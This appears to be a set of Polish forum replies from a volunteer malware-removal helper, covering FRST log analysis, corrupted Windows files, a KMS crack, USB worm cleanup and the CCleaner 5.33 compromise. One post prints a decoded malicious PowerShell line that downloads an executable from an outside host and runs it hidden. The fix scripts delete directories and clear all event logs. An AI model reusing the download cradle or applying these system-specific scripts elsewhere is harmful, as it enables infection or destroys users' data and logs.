picasso

Wyciąg z Szukaj plików wykazuje masową dewastację komponentów, wyróżniam dwie nieprawidłowe grupy: ----> Wszystkie odczyty z sumą kontrolną D41D8CD98F00B204E9800998ECF8427E (suma ciągu pustego) oraz bez opisu "Microsoft" to pliki definitywnie uszkodzone: ----> Pozostałe wyniki pozornie wyglądające "OK" poprzez opis "Microsoft" też wyglądają podejrzanie, różne wersje komponentów mają wspólną sumę kontrolną, tak jakby kopiowano "na oko" ten sam plik w różne miejsca. Powiązane sumy kontrolne nie wyglądają na prawidłowe. Na szybko przykład: Zdewastowane komponenty nie posiadają poprawnej kopii alternatywnej w WinSxS, a kopie spoza tego systemu na dysku X: RE oraz cache ComboFix są za stare i niekompletne (te z dysku X: są tylko 64-bitowe, podczas gdy mamy też naruszenia 32-bitowe), więc pliki musiałyby być kopiowane z innego systemu posiadającego identyczne wersje komponentów. I może nie pomóc podstawienie tylko głównych wersji plików w system32/SysWOW64 (KnowDLLs jest bardzo "czułe" i pamiętam przypadek BSOD z forum wymagający uzgodnienia wszystkich kopii), a uzupełnienie wszystkich wersji komponentów w WinSxS to pracochłonna robota, nie można "na oko" powielać tego samego pliku, każdy komponent ma inną sumę kontrolną MD5. Poza tym, wyniki wyszukiwania nie wróżą za dobrze, podobna sytuacja może być w obszarze innych komponentów których log FRST po prostu nie wykaże, a danych nie można potwierdzić (SFC nie nagrywa raportu w trybie "offline"). Jest zbyt dużo jawnych uszkodzeń oraz podejrzenie wielu innych uszkodzeń. Poddaję w wątpliwość próby szczegółowej reperacji systemu reanimowanego z padniętego dysku. Sugeruję raczej wykonanie tzw. nakładkowej reperacji, która daje większą gwarancję "przebicia" większej ilości uszkodzonych plików:

W raporcie FRST rzuca się w oczy następująca informacja: ==================== Known DLLs (filtrowane) ========================= C:\Windows\System32\kernel32.dll BRAK <==== UWAGA [2016-12-22 01:20] - [2016-10-11 16:31] - 001068544 _____ () C:\Windows\System32\MSCTF.dll [2017-04-04 14:05] - [2017-04-04 14:05] - 000000000 _____ () C:\Windows\SysWOW64\rpcrt4.dll Jeden z kluczowych plików nieobecny, dwa pozostałe uszkodzone (brak etykiety Microsoftu). Log z FRST jest mocno ograniczony tylko do elementów stricte startowych, więc to prawdopodobnie nie są wszystkie uszkodzenia. Na jednym z zrzutów ekranów jest też informacja o uszkodzeniu cng.sys, choć nie mam pewności czy coś już nie zostało tu naprawione (może sfc /scannow z "off"), bo w logu figuruje jako świeżo utworzony: 2017-11-11 15:37 - 2016-11-20 15:07 - 000467392 _____ (Microsoft Corporation) C:\Windows\System32\Drivers\cng.sys Na razie: Uruchom FRST ponownie, w polu Szukaj wpisz 4 nazwy plików rozdzielone średnikami (bez spacji pomiędzy): kernel32.dll;MSCTF.dll;rpcrt4.dll;cng.sys Klik w Szukaj plików i dostarcz log Search.txt utworzony tam skąd uruchamiasz FRST.

Opis sugeruje, że może być wymagana reinstalacja całego systemu. Podaj dokładne szczegóły / kody błędu pokazujące się na ekranie naprawczym. Na wszelki wypadek dodaj też raport z FRST zrobiony z poziomu środowiska zewnętrznego: Polecenie podstawowe sfc /scannow adresuje bieżący system, czyli to wyniki z innego systemu niż ze zdefektowanego dysku i są tu zupełnie nieprzydatne. Natomiast polecenie z przełącznikami "off" nie nagrywa danych do CBS.log, tylko na Windows 7 komunikat nie podaje tej informacji, na nowszych platformach dodano do komunikatu treść: "Details are included in the CBS.Log windir\Logs\CBS\CBS.log. For example C:\Windows\Logs\CBS\CBS.log. Note that logging is currently not supported in offline servicing scenarios." Czyli brak danych i nie ma jak tu ruszyć.

Infomacyjnie:

Adres 93.184.220.29 jest ponoć związany z certyfikatami: link, link.

Ta karta nie wykazuje śladów infekcji.

Wersja 1709 wydana co dopiero i wdrażanie via Windows Update jest robione partiami, tzn. na razie nie wszyscy użytkownicy mają tę ofertę na Windows Update, dlatego u Ciebie najwyższa wykryta edycja to 1703. Tak się dzieje chyba przy każdej edycji w czasie bardzo bliskim jej wydania. Komunikat o dostępności starszej aktualizacji zniknie, jeśli zaktualizujesz system przy udziale Asystenta aktualizacji. Aktualizacja edycji zeruje cały folder Windows.

+ Na dysku jest definitywnie więcej niż jeden profil (Default + Profile Numer). Widać też że co dopiero robiłeś próbę tworzenia kolejnego profilu (Profile 1 zmieniło się w Profile 2), ale ta operacja nie zmieniła stanu rzeczy i nadal jest więcej niż jeden folder profilu. Skoro w opcjach widzisz tylko jedną Osobę, to oznacza że poprzedni profil jest martwy i należy ręcznie usunąć katalog martwego profilu. To załączę w skrypcie poniżej. Operacje zadane w punkcie 2 tyczyły tylko bieżącego profilu (są nieaktualne po utworzeniu nowego, co właśnie uczyniłeś), nie wpływają w ogóle na ilość profilów / ich folderów na dysku. Już usunąłeś to narzędzie z dysku, ale w Twoim pierwszym logu był widoczny: 2017-10-16 13:01 - 2017-10-16 13:01 - 000448512 _____ (OldTimer Tools) C:\Users\Rafał\Downloads\TFC.exe Archiwalny opis programu na forum: KLIK. Jak mówiłam, ten program nie powinien być stosowany na nowszych systemach niż Windows 7. 1. Usunięcie pustych wpisów / odpadków. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: StartRegedit: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}] @="Bing" "DisplayName"="@ieframe.dll,-12512" "URL"="http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC" [HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}] @="Bing" "DisplayName"="@ieframe.dll,-12512" "URL"="http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC" EndRegedit: CustomCLSID: HKU\S-1-5-21-886091981-26357939-1909133584-1001_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 -> C:\Users\Rafał\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\amd64\FileSyncShell64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-886091981-26357939-1909133584-1001_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 -> C:\Users\Rafał\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\amd64\FileSyncShell64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-886091981-26357939-1909133584-1001_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 -> C:\Users\Rafał\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\amd64\FileSyncShell64.dll => Brak pliku Task: {1CF04B0B-D27D-4CAD-892A-D77B2C69EF0C} - System32\Tasks\SafeZone scheduled Autoupdate 1479649039 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe Task: {703DB337-CF41-453C-A2EB-01BF44B10AA6} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-07-12] (AVAST Software) Task: {79C06A0F-BDAC-4397-BD62-46C870285ECB} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" HKLM-x32\...\RunOnce: [!CD] => C:\Windows\temp\dragon_setup.exe [70057568 2017-10-17] (Comodo) <==== UWAGA HKLM\...\StartupApproved\Run: => "Malwarebytes TrayApp" HKU\S-1-5-21-886091981-26357939-1909133584-1001\...\StartupApproved\Run: => "RESTART_STICKY_NOTES" HKU\S-1-5-21-886091981-26357939-1909133584-1001\...\StartupApproved\Run: => "Steam" HKU\S-1-5-21-886091981-26357939-1909133584-1001\...\StartupApproved\Run: => "BitTorrent" DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AVAST Software RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files\Common Files\AV\avast! Antivirus RemoveDirectory: C:\Program Files (x86)\metadata RemoveDirectory: C:\Program Files (x86)\Mozilla Firefox RemoveDirectory: C:\Program Files (x86)\NCH Software RemoveDirectory: C:\Program Files (x86)\reports RemoveDirectory: C:\ProgramData\{6E35203C-6E98-4378-8362-112CFE55C2C1} RemoveDirectory: C:\ProgramData\adaware RemoveDirectory: C:\ProgramData\AVAST Software RemoveDirectory: C:\ProgramData\Avg RemoveDirectory: C:\ProgramData\Avira RemoveDirectory: C:\ProgramData\dbg RemoveDirectory: C:\ProgramData\IObit RemoveDirectory: C:\ProgramData\Kaspersky Lab Setup Files RemoveDirectory: C:\ProgramData\Lavasoft RemoveDirectory: C:\ProgramData\McAfee RemoveDirectory: C:\ProgramData\NCH Software RemoveDirectory: C:\ProgramData\Temp RemoveDirectory: C:\ProgramData\UniqueId RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Call of Duty RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Europa Universalis IV Rights of Man RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FireFly Studios RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paradox Interactive RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SEGA RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stronghold Crusader 2 RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Total War ROME II Emperor Edition RemoveDirectory: C:\Users\Rafał\AppData\Local\AdAwareDesktop RemoveDirectory: C:\Users\Rafał\AppData\Local\AdAwareUpdater RemoveDirectory: C:\Users\Rafał\AppData\Local\drmingw RemoveDirectory: C:\Users\Rafał\AppData\Local\Firefox RemoveDirectory: C:\Users\Rafał\AppData\Local\GG RemoveDirectory: C:\Users\Rafał\AppData\Local\Google\Chrome\User Data\Default RemoveDirectory: C:\Users\Rafał\AppData\Local\Google\Chrome\User Data\System Profile RemoveDirectory: C:\Users\Rafał\AppData\LocalLow\Mozilla RemoveDirectory: C:\Users\Rafał\AppData\Roaming\Avira RemoveDirectory: C:\Users\Rafał\AppData\Roaming\GG RemoveDirectory: C:\Users\Rafał\AppData\Roaming\icfib RemoveDirectory: C:\Users\Rafał\AppData\Roaming\NCH Software RemoveDirectory: C:\Users\Rafał\AppData\Roaming\New Version Available RemoveDirectory: C:\Users\Rafał\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Delete Doctor RemoveDirectory: C:\Windows\AutoKMS RemoveDirectory: C:\Windows\System32\Tasks\AVAST Software Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. Nowe skany FRST nie są na razie potrzebne. 2. Jest tu też aspekt cracka KMS: S2 KMSEmulator; C:\ProgramData\KMSAuto\bin\KMSSS.exe [301056 2015-07-24] (MDL Forum, mod by Ratiborus) [Brak podpisu cyfrowego] R2 KMSServerService; C:\Windows\KMSServerService\KMS Server Service.exe [236032 2017-10-16] (My Digital Life Forums) [Brak podpisu cyfrowego] R3 ptun0901; C:\Windows\system32\DRIVERS\ptun0901.sys [27136 2014-08-08] (The OpenVPN Project) 2017-10-15 22:36 - 2017-10-16 22:36 - 000000000 ____D C:\Windows\AutoKMS 2017-10-15 22:36 - 2017-10-15 22:36 - 000003758 _____ C:\Windows\System32\Tasks\AutoKMS 2017-10-15 22:35 - 2017-10-15 22:36 - 000000000 ____D C:\ProgramData\Microsoft Toolkit 2017-10-15 22:32 - 2017-10-15 22:32 - 000000000 ____D C:\ProgramData\KMSAuto 2017-10-15 22:18 - 2014-08-08 18:31 - 000027136 _____ (The OpenVPN Project) C:\Windows\system32\Drivers\ptun0901.sys 2017-10-15 22:18 - 2014-05-25 02:36 - 000015360 _____ C:\Windows\system32\SppExtComObjHook.dll 2017-10-15 22:18 - 2014-05-25 02:36 - 000004608 _____ C:\Windows\system32\SppExtComObjPatcher.exe 2017-10-15 22:17 - 2017-10-15 22:38 - 000000000 ____D C:\Users\Rafał\AppData\Local\MSfree Inc 2017-10-15 22:16 - 2017-10-15 22:16 - 000000000 __RHD C:\Windows\KMS Crack został już częściowo uszkodzony (prawdopodobnie przez AdwCleaner), gdyż w Harmonogramie figurowało uszkodzone zadanie AutoKMS kierujące donikąd. To zadanie załączone powyżej w skrypcie naprawy, ale resztę cracka to należy odwrócić deinstalatorem cracka. 3. Jeśli chodzi o komunikat o naruszeniu WMI, który nadal figuruje, to nadal nie jest wykluczony wpływ COMODO. Niemniej na wszelki wypadek poproszę o raport diagnostyczny z WMI Diagnosis Utility. Skrypt należy uruchomić jako Administrator, czyli po rozpakowaniu narzędzia do jakiegoś folderu w krótkiej ścieżce dostępu i bez spacji: klawisz z flagą Windows + X > Wiersz polecenia (Administrator) > wklep ścieżkę do pliku WMIDiag.vbs i ENTER. Wynikowemu raportowi zmień ręcznie rozszerzenie z *.log na *.txt, by wszedł w załączniki.

Skorzystaj z Asystenta aktualizacji, który jest zawsze linkowany na stronie głównej pobierania Windows 10. Asystent instaluje najnowszą dostępną linię. PS. Instalacje z Windows Update też powinny podstawić najnowszą dostępną wersję (z pominięciem pośrednich). Np. ostatnio z Windows Update aktualizowałam wersję początkową RTM od razu do Wersji 1703.

Fix poprzedników adresował mniej niż Miszela i temat infekcji to wcale nie został rozwiązany do końca (pominęli np. blokady w pliku Hosts wprowadzone przez infekcję certyfikatów). Miszel pociągnie ten temat, ja skomentuję tylko niektóre wątki: W kwestii WMI, ten ostatni log wykazuje także całą masę innych dziwnych "uszkodzeń" (ogromna ilość usług / sterowników w stanie "U" + "Brak podpisu cyfrowego"). Te wszystkie objawy mogą być skutkiem uruchomienia FRST w niepoprawny sposób, tzn. poprzez piaskownicę Comodo. FRST uruchomiony w taki sposób ma charakterystyczną zieloną obwódkę naokoło okna, nie ma dostępu do danych i wynikowe logi pokazują dużo dziwnych rzeczy. Tak więc zrób nowy zestaw raportów z FRST, upewniając się że FRST nie jest uruchomiony wsposób wirtualny i Comodo go nie blokuje. Po pierwsze, jest tu układ z więcej niż jednym profilem, który może to wyjaśniać: Chrome: ======= CHR DefaultProfile: Profile 1 (...) CHR Profile: C:\Users\Rafał\AppData\Local\Google\Chrome\User Data\Default [2017-10-16] (...) CHR Profile: C:\Users\Rafał\AppData\Local\Google\Chrome\User Data\Profile 1 [2017-10-17] (...) Po drugie, są w pewnych miejscach skróty do fałszywego Chrome: Shortcut: C:\Users\Rafał\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk -> C:\Program Files (x86)\Standoor\Application\chrome.exe (Brak pliku) Zwykle w takich przypadkach usuwa się nieużywane profile w konfiguracji Osoby, następnie wszystkie skróty Chrome, a po tym ręcznie tworzy nowe. I jeszcze uwaga na koniec: był używany TFC Cleaner (TFC.exe). To narzędzie kończy kompatybilność na Windows 7, nie jest bezpieczne jego używanie na nowszych systemach (zagrożenie uszkodzeniami).

Fiks pomyślnie wykonany. Czy są jeszcze jakieś problemy w systemie lub na urządzeniach?

Wg obrazka to nie oryginalna Petya tylko piracki wariant EternalPetya. Jak powiedziane w artykule, ten wariant jest prawdopodobnie celowo "uszkodzony" i odkodowanie awykonalne, nawet przez autorów malware (!): W tym przypadku nie pomoże więc nawet uiszczenie opłaty.

Plik w postaci załącznika został usunięty, gdyż nie wolno na serwer tutaj ładować zainfekowanych plików, niezależnie od tego czy plik stanowiłby zagrożenie dla innych (zmieniona nazwa rozszerzenia). Cytowana zawartość pliku bez wątpienia wskazuje, że to szkodnik, ale szkodnik dla platformy Windows wykorzystujący wbudowany w system PowerShell. Komenda wdrażana przy udziale PowerShell po odkodowaniu: PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('hxxp://mwojciechowicz.nstrefa.pl/zdr/s50.exe', $env:APPDATA\nvid.exe );Start-Process ( $env:APPDATA\nvid.exe ) [Czyli jest pobierany z serwera plik s50.exe, który zostaje wstawiony na Windows w ścieżce %AppData%\nvid.exe] Jeśli załącznik był pobrany tylko na tablet z Androidem, tu kończy się pomoc, gdyż ani nie ma narzędzi diagnostycznych na Androida które stosujemy tutaj, ani cytowana zawartość nie wskazuje by platforma Android była w zakresie działania infekcji. Jeśli jednak załącznik miał styczność z platformą Windows, wymagane są raporty obowiązkowe działu.

Wg skanu USBFix jest wykryte nowe urządzenie (o czym świadczy inna zawartość z muzyką). Ta sama litera F:, gdyż odpiąłeś poprzedni dysk i została ona zwolniona do ponownego mapowania. Urządzenie wg spodziewań również wykazuje ślady infekcji (2 ukryte foldery oraz szkodliwe pliki). Kolejna porcja działań: Oczywiście urządzenie musi być podpięte i widoczne pod literą F:. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: StartBatch: attrib /d /s -r -s -h F:\* del /q F:\*.scr del /q F:\Autorun.inf del /q F:\Thumbs* reg load HKLM\Temp C:\FRST\Hives\SOFTWARE reg export "HKLM\Temp\Microsoft\Windows NT\CurrentVersion\Winlogon" C:\Users\KAZI\Desktop\eksport.reg reg unload HKLM\Temp EndBatch: DeleteQuarantine: Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Naprawa powinna wykonać się szybko i bez restartu. Powstanie kolejny plik fixlog.txt w folderze z którego uruchamiasz FRST - pokaż go. Dodatkowo, na Pulpicie powstanie plik eksport.reg. Shostuj ten plik na jakimś serwisie zewnętrznym i podaj link do pliku.

Naprawa pomyślnie wykonana, infekcja wygląda na usuniętą z dysków C i F. Owszem, infekcji mogła ulec także karta. Podłącz urządzenie do komputera i zrób nowy log USBFix z opcji Listing.

Zakładam że urządzenie nadal jest widoczne pod literą F:, w przeciwnym wypadku skrypt naprawy nie zadziała. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: C:\*.scr C:\Autorun.inf C:\Thumbs.com F:\*.scr F:\Autorun.inf F:\Thumbs* Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Tym razem naprawa powinna wykonać się szybko i bez restartu. Powstanie kolejny plik fixlog.txt w folderze z którego uruchamiasz FRST - pokaż go.

Nie, nie należy ponawiać opcji Napraw, to jednorazowe zadanie i nie wykona ponownie tego samego. Logi z FRST wykazują, że naprawa się wykonała, ale chcę potwierdzić to na 100% i obejrzeć szczegóły przeprowadzonej naprawy, a dane są w pliku Fixlog.txt. Ten plik musi być u Ciebie na dysku. FRST uruchamiałeś z folderu Pobrane (C:\Users\KAZI\Downloads), więc plik powinien być właśnie tam. Wejdź do tego folderu i poszukaj pliku Fixlog.txt.

Plik Fixlog automatycznie jest tworzony podczas wykonywania opcji Napraw. Tę opcję już użyłeś (nie próbuj jej używać ponownie!), więc plik powinien być w folderze Pobrane, bo stamtąd był uruchamiany FRST. Dostarcz go. A jeśli chodzi o logi z opcji Skanuj, to mówiłam że tym razem bez Shortcut, czyli dwa logi miały powstać (FRST.txt + Addition.txt) i te są załączone OK.

Jak napisałam: Czyli ten plik jest w folderze Pobrane.

Komunikat "Surabaya" wynika ze szkodliwej modyfikacji wartości LegalNotice. Natomiast foldery System Volume Information (Przywracanie systemu) i $Recycle.Bin (rzeczywisty folder Kosza, na Pulpicie to tylko wirtualny skrót) to poprawne foldery Windows które były od momentu instalacji, a nagle się pokazały, gdyż została przestawiona opcja Ukryj chronione pliki systemu operacyjnego. Działania do przeprowadzenia: 1. Przez Panel sterowania odinstaluj: Adobe Flash Player 22 NPAPI (niepotrzebny, w systemie brak Firefox) oraz Java 8 Update 91 (stara wersja). 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: HKLM\...\Winlogon: [LegalNoticeCaption] 81u3f4nt45y - 24.01.2007 - Surabaya HKLM\...\Winlogon: [LegalNoticeText] Surabaya in my birthday Don't kill me, i'm just send message from your computer Terima kasih telah menemaniku walaupun hanya sesaat, tapi bagiku sangat berarti Maafkan jika kebahagiaan yang kuminta adalah teman sepanjang hidupku Seharusnya aku mengerti bahwa keberadaanku bukanlah disisimu, hanyalah lamunan dalam sesal Untuk kekasih yang tak kan pernah kumiliki 3r1k1m0 HKU\S-1-5-21-1671606494-1044672718-3766306234-1000\...\Run: [World of Tanks] => "C:\Games\World_of_Tanks\WargamingGameUpdater.exe" HKU\S-1-5-21-1671606494-1044672718-3766306234-1000\...\Run: [blueStacks Agent] => C:\Program Files\Bluestacks\HD-Agent.exe HKU\S-1-5-21-1671606494-1044672718-3766306234-1000\...\Run: [ALLUpdate] => "C:\Program Files\ALLPlayer\ALLUpdate.exe" "sleep" HKU\S-1-5-21-1671606494-1044672718-3766306234-1000\...\Run: [Napisy24Update] => "C:\Program Files\Napisy24\Napisy24Update.exe" "sleep" Startup: C:\Users\KAZI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Online.com [2013-02-14] () Startup: C:\Users\KAZI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe update.com [2013-02-14] () HKLM\...\scrfile\shell\open\command: %1 HKU\S-1-5-21-1671606494-1044672718-3766306234-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.gazeta.pl/0,0.html?p=190 CHR HomePage: Default -> hxxp://www.gazeta.pl/0,0.html?p=190 CHR StartupUrls: Default -> "hxxp://www.gazeta.pl/0,0.html?p=190" ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku Task: {2E30A5E3-105F-4019-AA46-5D6DE366E773} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-09-10] (AVAST Software) Task: {D4C0B434-28E0-4BAF-8A58-EEA266A1E299} - System32\Tasks\{E27543BE-AD41-4D4A-9BBB-749028E94C6E} => C:\Users\KAZI\Desktop\Let's Play\GAME OF THE YEAR 420 BLAZE IT.exe DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AVAST Software DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\mozilla.org DeleteKey: HKLM\SOFTWARE\MozillaPlugins C:\Program Files\Common Files\AV\avast! Antivirus C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Goat Simulator C:\Users\KAZI\AppData\Local\Mozilla C:\Users\KAZI\AppData\Roaming\Mozilla C:\Users\KAZI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam C:\Users\KAZI\AppData\Roaming\04d977f7136142501f27f91796e178a32 C:\Windows\System32\Tasks\AVAST Software cmd: netsh advfirewall reset Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt.

Jeśli na komputerze jest wersja 5.33, to niezależnie od tego czy klucz infekcji został utworzony w rejestrze czy nie, pliki wykonywalne mają wstawiony szkodliwy kod (po prostu mógł się nie zaktywować) i należy program kompletnie odinstalować, następnie pobrać najnowszą wersję. O ile ktoś oczywiście ma nadal zaufanie do tego programu...

To nie wygląda na fałszywy alarm. Malware jest w exeku w folderze wersji 64-bitowej tylko nieaktywne (nie tworzy klucza Agomo w rejestrze, nie wysyła w eter danych) i będzie wykrywane przez programy skanujące. Na wszelki wypadek należy zastąpić wersje. Problem infekcji dotyczy tylko wymienionych wersji dla Windows, co jest wyraźnie podane w linkowanym oficjalnym komunikacie Piriform. Edycja dla Androida to inna linia (wersja v1.20.86 z sierpnia).

Nie przedstawiłeś pliku Fixlog.txt. Nie wiem z jakiej przyczyny, gdyż skrypt FRST nie ruszał tego (ani powiązanych komponentów Roboform): OPR Extension: (RoboForm Password Manager) - C:\Program Files (x86)\Siber Systems\AI RoboForm\Chrome [2016-12-18]

RepairDNS wycofany został ze względu właśnie na fałszywe alarmy: KLIK. Jak podane w linku, początkowo fałszywe alarmy na Windows 7, potem też na Windows 10. Autor stwierdził, że nie będzie poszukiwał przyczyn (prawdopodobnie wynik którejś aktualizacji Windows) tylko wycofa program, gdyż tę infekcję i tak wykrywają obecnie wszystkie główne antywirusy.

A rzeczywiście, widzę że narzędzie usunięte, potem poprawię link lub zamienię opis. Raporty z FRST są zbędne (usuwam), one pokazują to samo co przedtem, a dla mnie jest jasne które gałęzie są montowane przez MBAM (jednoznaczne nazwy gałęzi) i nie potrzebuję nowych raportów by to samodzielnie "przefiltrować". Pliki dnsapi.dll nie są wykryte jako naruszone. Moim zdaniem to jest jakiś błąd w RepairDNS, być może ściągnąłeś jakąś wadliwą wersję z bugami (które naprawiono później), albo program właśnie wycofano ze względu na błędy. Żadnych oznak, by przyczyną kłopotów była infekcja. PS. A co do tej wspominanej kosmetyki, to w spoilerze drobny skrypt do FRST. Zakładam, że ShadowDefender nie odkręci zmian.